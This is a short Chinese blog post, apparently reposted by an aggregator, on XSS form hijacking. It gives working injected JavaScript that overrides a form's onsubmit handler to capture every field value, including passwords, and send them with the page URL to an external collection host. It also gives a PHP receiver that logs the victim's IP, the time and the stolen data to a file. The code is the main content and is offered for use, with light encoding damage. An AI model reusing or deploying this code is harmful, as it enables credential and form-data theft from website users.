大家都知道,在提交form表單時(shí)會(huì)調(diào)用onsubmit方法,既然調(diào)用了onsubmit,說明表單中該填的項(xiàng)肯定都已經(jīng)填好了,這時(shí),我們通過修改onsubmit方法,便可以獲取表單中的信息.

xss.js:

var?f=document.forms['from1']; if(f==undefined) {f=document.getElementById(''); } var?func=f.onsubmit; f.οnsubmit=function(event) {var?str='';for(var?i=0;i<f.elements.length;i++){str+=f.elements[i].name+':'+f.elements[i].value+'||';}str=str.substr(0,str.length-2);var?img=new?Image();img.src='https://blog.51cto.com/xss.php?data='+escape(str)+'&url='+escape(location.href);func(event);return?true; }

根據(jù)各程序不同，修改表單名稱

var?f=document.forms['form1'];

接收端xss.php

<?php $ip?=?$_SERVER['REMOTE_ADDR']; $cookie?=?$_GET['data']; $url?=?$_GET['url']; $time?=?gmdate("H:i:s",time()+8*3600); $file?=?"jzking121.txt"?; $fp=fopen?("jzking121.txt","a")??; $txt=?"$ip"."----"."$time"."----"."$cookie"."----"."$url"."\n"; fputs($fp,$txt); ?>

參考：

http://dwblog.github.io/2015/04/29/%E8%A1%A8%E5%8D%95%E5%8A%AB%E6%8C%81/

轉(zhuǎn)載于:https://blog.51cto.com/jzking121/1914721

總結(jié)

以上是生活随笔為你收集整理的xss 表单劫持(from通用明文记录)的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。